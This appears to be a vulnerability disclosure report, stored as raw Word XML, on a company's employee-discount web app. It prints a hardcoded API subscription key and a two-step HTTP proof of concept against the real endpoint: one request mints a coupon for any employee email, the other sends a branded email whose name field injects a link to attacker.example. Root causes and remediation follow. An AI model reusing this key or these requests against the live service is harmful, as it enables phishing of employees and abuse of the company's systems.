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Employee Discount SPA — Combined Technical Exploit Note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Generated on: 2025-10-10 04:31:38</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>All evidence comes from the public, compiled JS bundle loaded by the app (/assets/index-*.js, captured via DevTools → Sources) and from live HTTP requests executed during testing. No source repositories or credentials were used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Summary (what’s broken)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Leaked secret in client bundle: The SPA ships an Azure APIM subscription key and uses it from the browser for backend calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Unauthenticated email sending: With only that key, anyone can call POST /simba/api/SendEmail and send a Purolator‑branded email. The name field is injected into the HTML body (link injection confirmed). Login is not required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Arbitrary coupon minting: With the same key, POST /simba/api/leads creates/returns a coupon for any corporate email, which then satisfies the server’s email↔code check in SendEmail. No login required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Secondary observation: Okta SDK is present; ensure tokens are not stored in localStorage and CSP is strict to reduce XSS risk. (Not needed to exploit the issues above.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Critical: reliable, organization‑wide phishing from notificationsservice@purolator.com with attacker‑controlled HTML in the email body, plus ability to mint a valid coupon for any employee to pass server checks. No user session or Okta token is required; possession of the leaked APIM key is sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Exposed Secret (hardcoded)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ocp-Apim-Subscription-Key: 8fa86b2628a04081b5e1d6539341c0e2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence from the shipped bundle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Hardcoded APIM client (base URL + key) and SendEmail call: axios instance pointed to https://pdl-apim-canc-unique.azure-api.net/simba/api with Ocp-Apim-Subscription-Key embedded; j4 posts to /SendEmail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Leads call (coupon minting) used by the UI: posts to /leads with campaignId "EMPLOYEEDISCOUNT" and target email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>OIDC/Okta is present but not enforced for these endpoints; they rely solely on the APIM key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Minimal PoC (no login required)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1) Mint coupon for any employee</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST https://pdl-apim-canc-unique.azure-api.net/simba/api/leads</w:t>
        <w:br/>
        <w:t>Ocp-Apim-Subscription-Key: 8fa86b2628a04081b5e1d6539341c0e2</w:t>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
        <w:br/>
        <w:t>[</w:t>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "email": "victim@purolator.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "campaignId": "EMPLOYEEDISCOUNT",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "firstName": "X",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "lastName": "Y",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "companyName": "Purolator"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
        <w:t># → 201 Created with JSON containing coupon.code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2) Send branded email with injected HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST https://pdl-apim-canc-unique.azure-api.net/simba/api/SendEmail</w:t>
        <w:br/>
        <w:t>Ocp-Apim-Subscription-Key: 8fa86b2628a04081b5e1d6539341c0e2</w:t>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "email": "victim@purolator.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "Hello &lt;a href=\"https://attacker.example/track\"&gt;Click here&lt;/a&gt;",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "code": "&lt;coupon_from_step_1&gt;"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t># → 200 OK; email delivered; injected link renders in body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Root causes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Secret in client bundle: static APIM subscription key embedded in public JS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Direct browser→APIM design: email and lead endpoints are called directly from the browser; no server-side auth/authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• HTML not sanitized in templates: name flows into the rendered email body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Immediate actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1) Revoke &amp; rotate the exposed APIM subscription key(s) now. Key is public in the bundle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2) Temporarily disable or IP‑restrict POST /simba/api/SendEmail and POST /simba/api/leads until a proper fix ships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3) Rebuild the SPA without any secrets; purge CDN caches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation (engineering)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Move both endpoints behind your backend: SPA → backend (session/JWT required) → APIM. Enforce: user can only email their own verified address; disallow arbitrary recipient selection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Sanitize/encode all template variables used in outbound emails; disallow raw HTML in name/code. Strip CRLF to prevent header injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Lock down APIM: no static keys in browsers. Prefer Managed Identity / client‑credentials, mTLS, and backend IP allow‑lists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Abuse controls: per‑user &amp; global rate limits; anomaly alerts; detailed logging (recipient, template, payload hash).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Defense‑in‑depth: strong CSP for the SPA; avoid localStorage for tokens; if Okta tokens must be in the browser, minimize scope/lifetime and harden against XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots (PoC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>116422fe-f31f-48fc-bbb3-532d4b38bad1.png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486400" cy="246202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22fe-f31f-48fc-bbb3-532d4b38bad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6202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260406fc-73e7-4a46-a1fe-f7c22c9d196d.png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486400" cy="3106757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60406fc-73e7-4a46-a1fe-f7c22c9d196d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067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43544827-3c7b-4911-88f4-da91a7d6fff5.png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486400" cy="1929326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3544827-3c7b-4911-88f4-da91a7d6fff5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2932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97e0770b-e186-495b-9e3b-af57dfe45b5d.png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486400" cy="2412054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7e0770b-e186-495b-9e3b-af57dfe45b5d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12054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